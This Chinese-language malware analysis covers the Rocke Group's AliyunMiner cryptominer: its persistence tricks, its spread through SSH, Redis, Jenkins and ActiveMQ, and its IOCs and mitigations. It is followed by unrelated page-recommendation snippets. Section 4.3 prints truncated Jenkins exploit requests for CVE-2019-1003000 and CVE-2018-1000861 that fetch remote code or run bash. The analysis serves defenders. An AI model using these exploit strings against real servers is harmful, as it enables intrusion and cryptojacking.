Rocke Group团伙新挖矿变种AliyunMiner分析
0x0 背景介绍
近期,深信服安全团队捕获到Rocke Group黑产团伙运营的新挖矿病毒,该病毒通过ssh爆破、ssh免密登录、redis未授权访问漏洞以及redis弱密码爆破、jenkins远程代码执行漏洞以及jenkins弱口令爆破和ActiveMQ远程代码执行漏洞进行传播的挖矿病毒。深信服安全团队对该挖矿木马进行了详细的技术分析,并根据其传播域名特征将其命名为AliyunMiner。
0x1 现象分析
机器上存在恶意的定时任务/var/spool/cron/crontabs/root
存在恶意启动项sshservice
/etc/crontab以及/etc/bashrc中被写入恶意命令
命令进行访问,可以看到aliyun.one页面上放置了恶意的代码(手动访问会跳转到阿里云官网)
0x2 病毒逻辑详细分析
1. 病毒为go语言编译而成,并且使用了变异的UPX加壳逃避杀软,该病毒母体使用了5个主要的package
github.com/hippies/LSD/LSDA——病毒相关配置初始化
github.com/hippies/LSD/LSDB——文件释放
github.com/hippies/LSD/LSDC——Linux权限维持
github.com/hippies/LSD/LSDD——攻击与传播包
Main——攻击入口点
2. github.com/hippies/LSD/LSDB——文件释放
2.1 释放劫持库文件到/usr/local/lib/xxx.c,然后进行编译
该劫持库源代码被gzip格式压缩打包在病毒文件中,32位程序奇热这里可以使用binwalk进行提取,64位手动提取。
将该so路径写入/etc/ld.so.preload文件,实现libc预加载,达到劫持的目的。该so主要劫持函数如下表
2.2 创建sshservice启动项github_com_hippies_LSD_LSDB_NetdnsWrite
释放服务bash模板文件到/etc/init.d/sshservice,该bash文同样被gzip格式压缩打包在病毒文件中,创建sshservice系统服务
释放Systemd配置文件到以下三个目录,创建sshservice的Systemd服务
2.3 释放挖矿github_com_hippies_LSD_LSDB_KWR
挖矿程序同样也被gzip压缩打包在病毒中,按顺序解压并释放到以下其中一个目录,运行后删除自身文件
从其配置文件可以看出,该挖矿病毒进行门罗币挖矿,并且其使用了两中连接方式,一种是代理矿池,另一种是直接连接矿池进行挖矿。
目前该矿池总共收益2.7个币
3. Github.com/hippies/LSD/LSDC——linux权限维持
3.1 获取用于创建定时任务时所需要的域名
3.2 屏蔽其他组织的恶意域名
向/etc/hosts文件中写入对应的IP-域名对,实现屏蔽。这里针对的主要是web2tor节点以及对应的一些矿池
3.3 执行下载bash命令,创建定时任务,污染bastrc文件实现启动
污染的bashrc,执行的pygo文件为python文件
4. github.com/hippies/LSD/LSDD——攻击与传播包
4.1 github_com_hippies_LSD_LSDD_Arun
利用ssh爆破实现自身的传播,用到了1000个密码对root账户进行爆破,下表只列出部分密码
4.2 github_com_hippies_LSD_LSDD_Brun
利用Redis未授权访问、 Redis弱口令爆破,将恶意bash写入定时任务文件,实现感染
爆破成功,设置redis数据库数据
写入如下恶意bash数据到定时文件
4.3 github_com_hippies_LSD_LSDD_Crun
利用Jenkins远程代码执行漏洞实现感染
漏洞编号 |
利用代码 |
CVE-2019-1003000 |
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27Lsdup%27,%20root=%27http:// |
CVE-2018-1000861 |
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7b+%22bash+-c+{echo, |
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=import+groovy.transform.*%0a%40ASTTest(value%3d%7bassert+java.lang.Runtime.getRuntime().exec(%22bash+-c+{echo, |
|
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x{public%20x(){new%20String(%22bash+-c+{echo, |
对Jenkins进行弱密码爆破实现感染,仅列出部分密码对
4.4 github_com_hippies_LSD_LSDD_Drun
ActiveMQ任意文件写入漏洞(CVE-2016-3088),本次样本中其会将文件上传并且移动到Linux定时任务文件,实现感染
5. 关联分析:
5.1 域名IP关联
通过aliyun.one可以关联到systemten.org域名
systemten.org在之前已经被指出为kerberods挖矿病毒,通过对kerberods的感染方式,权限维持等方式进行对比,可以确认本次的aliyun.one与kerberods挖矿家族为同一个团体在运营。该团队在之前被Unit42团队披露为Rocke Group黑产团伙。
5.2 差异对比
0x3 感染方式
1、ssh弱口令爆破
2、ssh免密登录
3、redis未授权访问漏洞
4、redis弱口令爆破
5、Jenkins弱口令爆破
6、Jenkins远程代码执行漏洞(CVE-2018-1000861、CVE-2019-1003000)
7、ActiveMQ任意文件写入漏洞(CVE-2016-3088)
0x4 防护
1、更改密码为强密码,密码每个机器不同
2、ssh免密登录要严格控制机器
3、加强redis防护,开启redis的密码验证,且密码更换未强密码
4、检测是否存在Jenkins弱密码,修改密码未强密码
5、检测是否存在jenkins远程代码执行漏洞并进行修复
6、检测是否存在ActiveMQ任意文件写漏洞。
7、检测是否存在Confluence未授权访问漏洞(CVE-2019-3396)
0x5 IOC
F81137FF4ED563101B3ACB8185CF16D5AF89C9E5
52AA4166F256495250C9191670DB258794059277
update.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
x64.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
cron.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
aliyun.one
pool.supportxmr.com
sg.minexmr.com
iap5u1rbety6vifaxsi9vovnc9jjay2l.com
img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png
img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png
https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png
https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png
钱包地址:
48tKyhLzJvmfpaZjeEh2rmWSxbFqg7jNzPvQbLgueAc6avfKVrJFnyAMBuTn9ZeG4A3Gfww512YNZB9Tvaf52aVbPHpJFXT
Ref:
https://v2ex.com/t/624351
https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-december-2019
https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/
https://unit42.paloaltonetworks.com/rockein-the-netflow/
Rocke Group团伙新挖矿变种AliyunMiner分析相关推荐
- 熊猫烧香变种病毒分析
熊猫烧香变种病毒分析分析报告 样本名 2_dump_SCY.exe(熊猫烧香) 作者 yusakul 时间 2018-07-13 平台 Win7-32 1.样本概况 1.1 样本信息 病毒名称 2_d ...
- 新浪是如何分析处理32亿条实时日志的?
服务介绍 随着实时分析技术的发展及成本的降低,用户已经不仅仅满足于离线分析.目前我们服务的用户包括微博,微盘,云存储,弹性计算平台等十多个部门的多个产品的日志搜索分析业务,每天处理约32亿条(2TB) ...
- Python新冠疫情可视化分析系统 计算机专业毕业设计源码08504
摘 要 文中首先对新冠疫情可视化分析的项目需求进行了背景分析,接着介绍了项目的总体设计思路,然后具体阐述了疫情数据库的设计.疫情数据的查询.疫情数据的展示,并分析了核心代码.文中利用MySQL数据库存 ...
- 群组密钥交换的新方法研究与分析【会议】
群组密钥交换的新方法研究与分析 写在前面的话 会议记录 写在前面的话 <网络空间安全青年科学家长安论坛>,本篇博客为南京信息工程大学沈剑老师的报告内容. 会议记录
- mysql1055_MySQL5.7 group by新特性报错1055的解决办法
项目中本来使用的是mysql5.6进行开发,切换到5.7之后,突然发现原来的一些sql运行都报错,错误编码1055,错误信息和sql_mode中的"only_full_group_by&qu ...
- 磁碟机变种简单分析(lsass.exe、smss.exe、dnsq.dll、NetApi000.sys)
from: http://bbs.xcdx169.net/redirect.php?tid=56034&goto=lastpost&sid=NrNn1c 磁碟机变种简单分析(lsass ...
- 新项目实操分析,用付费视频进行流量变现
我们知道,互联网的发展,使得网民越来越多,不仅上网的用户在增多,上网的时间也逐年增加. 所以很多人都想做互联网的生意,因为互联网有足够的关注度和巨大的流量.而且,互联网项目属于网上创业,硬件门槛相对较 ...
- 2019/08/14_用于新基因的生物信息学分析 (转载)
用于新基因的生物信息学分析 核酸序列的基本分析 运用DNAMAN软件分析核酸序列的分子质量.碱基组成和碱基分布.同时运用BioEdit(版本7.0.5.3)软件对基因做酶切谱分析. ...
- 系统规划---新旧系统的分析和比较
新旧系统的分析和比较 计算机技术飞速发展,日新月异,许多企业因为业务发展的需要和市场竞争的压力,需要建设新的企业信息系统.在这种升级改造的过程中,怎么处理和利用那些历史遗留下来的老系统,成为影响新系 ...
最新文章
- iOS runtime实用篇:让你快速上手一个项目
- bzoj1492: [NOI2007]货币兑换Cash
- TP5 实现多字段的关键词模糊查询
- dell电脑重装系统no bootable devices found
- boost::process::group相关的测试程序
- 吴恩达机器学习系列课程--个人笔记
- Cordova内部http请求的proxy实现原理
- linux自学(四)之开始centos学习,网络配置
- 4018-基于非递归的二叉排序树的结点的查找和插入(C++,附思路)
- SAP License:OB52等与Client状态相关的前台操作
- HTML5中的WebSocket
- Spring Cloud 配置中心中的native配置
- 时间管理的十一条金律
- python实现web服务器_python实现web服务器
- Apache Server 修复两个高危缺陷
- Creating and Destroying Objects
- unity 脚本把变量放一起,在界面上显示,同时鼠标靠近时有注释出现,变量是滑动条有区间
- 3.Python标准库—math库的使用
- windows10+Ubuntu双系统卸载旧Ubuntu并重装Ubuntu(绝对安全)
- linux上安装docker,并且安装上数据库